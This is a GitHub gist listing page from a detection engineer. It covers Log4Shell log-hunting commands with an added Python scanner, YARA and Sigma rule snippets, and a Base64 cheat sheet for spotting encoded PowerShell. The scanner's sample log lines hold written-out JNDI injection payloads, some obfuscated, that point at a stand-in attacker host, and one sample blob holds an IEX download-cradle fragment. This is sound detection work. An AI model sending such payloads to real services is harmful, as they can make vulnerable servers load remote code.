Florian Roth Neo23x0

Neo23x0 / cyber-security-blogs.txt
Created September 10, 2022 13:49
Cyber Security Blogs
https://thedfirreport.com/
https://www.zerodayinitiative.com/blog/
https://codewhitesec.blogspot.com/
https://www.digitalshadows.com/blog-and-research/
https://blog.talosintelligence.com/
https://www.riskiq.com/blog/
https://www.sekoia.io/en/blog-sekoia-io/
https://www.nextron-systems.com/blog/
https://www.microsoft.com/security/blog/
https://blog.truesec.com/
Neo23x0 / nvidia_cert_leak_vt_dorks.md
Created March 5, 2022 12:49
Samples Signed with NVIDIA Certs
Neo23x0 / log4j_rce_detection.md
Last active April 8, 2026 10:46
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against the Log4j RCE vulnerability CVE-2021-44228 (Log4Shell).

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files under /var/log and all subfolders (-r); -I skips binary files and -i makes the match case-insensitive. zgrep covers the gzip-compressed rotated logs.

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
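As an added example that is not part of the gist, the same pattern ported to Python and run over constructed sample log lines, with a normalization step in front of it for the obfuscations the plain pattern misses: nested ${lower:…} / ${::-…} lookups and URL-encoded "${". The normalization rules, the helper names and the sample lines are assumptions of this example. One caveat on the original command: inside a POSIX ERE bracket expression "[^\n]" excludes the literal characters "\" and "n" rather than a newline, but since only one trailing character is required the grep and the Python port flag the same lines.

```python
import gzip
import re
import urllib.parse
from typing import Iterable, List, Tuple

# The gist's egrep pattern ported to Python; re.IGNORECASE stands in for -i.
JNDI_PATTERN = re.compile(
    r"\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+",
    re.IGNORECASE,
)

# Log4j lookup syntax used to hide the literal "jndi" token. Which rewrites to
# apply is an assumption of this example, not something the gist specifies:
#   ${lower:j} / ${upper:J}              -> j  (case lookups)
#   ${::-j}, ${env:NOPE:-j}, ${sys:x:-j} -> j  (default-value syntax)
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")


def normalize(line: str) -> str:
    """Undo URL encoding and nested lookups so the plain pattern can match."""
    s = urllib.parse.unquote(line)  # %24%7Bjndi%3A -> ${jndi:
    prev = None
    while prev != s:  # lookups nest: reduce innermost first, until stable
        prev = s
        # Both lookups resolve to the letter itself; case is irrelevant
        # downstream because JNDI_PATTERN is case-insensitive.
        s = _CASE_LOOKUP.sub(lambda m: m.group(1).lower(), s)
        s = _DEFAULT_LOOKUP.sub(r"\1", s)
    return s


def scan_lines(lines: Iterable[str]) -> List[Tuple[int, str, str]]:
    """Return (line number, how it matched, line) for each suspicious line."""
    hits = []
    for n, line in enumerate(lines, start=1):
        if JNDI_PATTERN.search(line):
            hits.append((n, "plain", line.rstrip("\n")))
        elif JNDI_PATTERN.search(normalize(line)):
            hits.append((n, "normalized", line.rstrip("\n")))
    return hits


def scan_file(path: str) -> List[Tuple[int, str, str]]:
    """Like zgrep: read gzip-compressed rotated logs transparently.

    errors="replace" keeps undecodable bytes from aborting the scan
    (egrep -I skips such files outright instead).
    """
    with open(path, "rb") as fh:
        is_gzip = fh.read(2) == b"\x1f\x8b"
    opener = gzip.open if is_gzip else open
    with opener(path, "rt", encoding="utf-8", errors="replace") as fh:
        return scan_lines(fh)


# Constructed sample lines in Apache combined-log style (not real traffic).
# Lines 1-4 are attacks (plain, lower-lookup, default-value lookup, URL-encoded);
# lines 5-6 are benign look-alikes.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /?x=${jndi:ldap://evil.example/a} HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:rmi://evil.example:1099/obj}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://evil.example/x}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fevil.example%2Fz%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET /docs/jndi-lookup.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.10 - - [10/Dec/2021:12:00:06 +0000] "GET /?s=${date:yyyy} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, how, line in scan_lines(SAMPLE_LOG):
        print(f"line {n} [{how}]: {line}")
```

Only the first sample line is caught by the plain pattern; the other three attacks surface only after normalization, which is why a grep over raw logs should be read as a lower bound rather than a clean bill of health.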
Neo23x0 / minecraft-seus-shader.md
Last active March 21, 2026 06:21
Minecraft with SEUS Shader - Guide
Neo23x0 / help.md
Last active July 30, 2023 12:19
Offensive Research Guide to Help Defense Improve Detection

I've transformed this gist into a git repository.


Whenever you research a certain vulnerability, ask yourself these questions and please answer them for us:

Logging

Does the exploited service write a log?
(check with `ls -lrt /var/log`, `lsof +D /var/log/` or `lsof | grep servicename`)

Neo23x0 / snippet_gen_yara_hash.py
Created October 10, 2020 15:51
YARA Rule Hash Used by Nextron Systems
import hashlib
import re


def calculate_rule_hash(rule):
    """
    Calculates a hash over the relevant YARA rule content (string contents, sorted condition)
    Requires a YARA rule object as generated by 'plyara': https://github.com/plyara/plyara
    :param rule: yara rule object
    :return hash: generated hash
    """
Neo23x0 / get-casing.py
Created July 2, 2020 14:18
Get All Possible Variations of Casings for a String
import itertools
s = "cmd.exe"
list(map(''.join, itertools.product(*zip(s.upper(), s.lower()))))
Neo23x0 / shitrix_artefacts.yar
Last active January 14, 2020 12:34
Netscaler Forensic Artefacts
rule SUSP_Netscaler_Forensic_Artefacts {
   meta:
      description = "Detects strings / forensic artefacts on exploited Netscaler systems"
      author = "Florian Roth"
      reference = "https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/"
      date = "2020-01-14"
      score = 70
   strings:
      $ = "shell_command=\"whoami\"" ascii
Neo23x0 / gen_godmode_rule.yml
Last active March 6, 2023 19:07
God Mode Sigma Rule
# ################################################################################
# IMPORTANT NOTE
# The most recent version of this POC rule can now be found in the main repository
# https://github.com/Neo23x0/sigma/blob/master/other/godmode_sigma_rule.yml
# ################################################################################
# _____ __ __ ___ __
# / ___/__ ___/ / / |/ /__ ___/ /__
# / (_ / _ \/ _ / / /|_/ / _ \/ _ / -_)
# \___/\___/\_,_/ /_/ /_/\___/\_,_/\__/_
# / __(_)__ ___ _ ___ _ / _ \__ __/ /__
Neo23x0 / Base64_CheatSheet.md
Last active April 13, 2026 08:47
Learning Aid - Top Base64 Encodings Table

Base64 Patterns - Learning Aid

Base64 code   Mnemonic aid          Decoded*   Description
JAB           🗣 Jabber             $.         Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env:
TVq           📺 Television         MZ         MZ header
SUVY          🚙 SUV                IEX        PowerShell Invoke-Expression
SQBFAF        🐣 Squab favorite     I.E.       PowerShell Invoke-Expression (UTF-16)
SQBuAH        🐣 Squab uahhh        I.n.       PowerShell Invoke string (UTF-16), e.g. Invoke-Mimikatz
PAA           💪 "Pah!"             <.         Often used by Emotet (UTF-16)
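An added example, not part of the cheat sheet: deriving such prefixes for any needle. Base64 maps each 3-byte group to 4 characters, so the same substring has three encodings depending on where it starts within a group; the table lists the form for a needle at the start of the data (offset 0), which is what you see at the beginning of an encoded PowerShell command. The code below computes the characters fully determined by the needle at all three offsets and builds a regex that finds it at any alignment, so a prefix learned from the table can also be hunted in the middle of a blob. Helper names are this example's own. Where a table entry's last character depends on the byte that usually follows (the final A of PAA, the A6 after JABlAG4AdgA), the function stops one character earlier because that character is not determined by the needle alone.

```python
import base64
import re
from typing import Tuple


def stable_b64(data: bytes, offset: int) -> str:
    """Base64 characters fully determined by `data` when its first byte sits
    `offset` (0, 1 or 2) bytes into a 3-byte Base64 group.

    The data is encoded twice with opposite filler bytes (0x00 and 0xFF)
    around it. Any output character that draws even one bit from the filler
    differs between the two encodings, so only characters built entirely
    from `data` survive the comparison.
    """
    tail = -(offset + len(data)) % 3  # pad to a whole group, so no '=' appears
    with_zeros = base64.b64encode(b"\x00" * offset + data + b"\x00" * tail).decode()
    with_ones = base64.b64encode(b"\xff" * offset + data + b"\xff" * tail).decode()
    return "".join(a for a, b in zip(with_zeros, with_ones) if a == b)


def b64_variants(text: str, encoding: str = "ascii") -> Tuple[str, str, str]:
    """The three alignment-dependent Base64 forms of `text`.

    Use encoding="utf-16-le" for PowerShell -EncodedCommand payloads and
    other UTF-16 content (the rows marked UTF-16 in the table).
    """
    data = text.encode(encoding)
    return tuple(stable_b64(data, k) for k in range(3))


def b64_needle_regex(text: str, encoding: str = "ascii") -> "re.Pattern[str]":
    """Regex matching `text` inside Base64 data at any of the three alignments."""
    # A one- or two-byte needle can leave an alignment with no stable character;
    # such empty alternatives are dropped rather than matching everything.
    alts = [v for v in b64_variants(text, encoding) if v]
    return re.compile("|".join(re.escape(v) for v in alts))


if __name__ == "__main__":
    for needle, enc in (("IEX", "ascii"), ("MZ", "ascii"), ("IEX", "utf-16-le"), ("$env:", "utf-16-le")):
        print(f"{needle!r:10} {enc:10} -> {' / '.join(b64_variants(needle, enc))}")
    # Constructed sample: a Base64 blob with "IEX" one byte off the group boundary.
    blob = base64.b64encode(b" IEX (New-Object Net.WebClient)").decode()
    print(blob, "->", b64_needle_regex("IEX").search(blob).group(0))
```

The offset-0 forms reproduce the table (SUVY, TV for MZ, SQBFAF…, JABlAG4AdgA…); the other two forms are what you need when the needle is not at the start of the data, which is the usual case for strings buried inside an encoded script or a dropped binary.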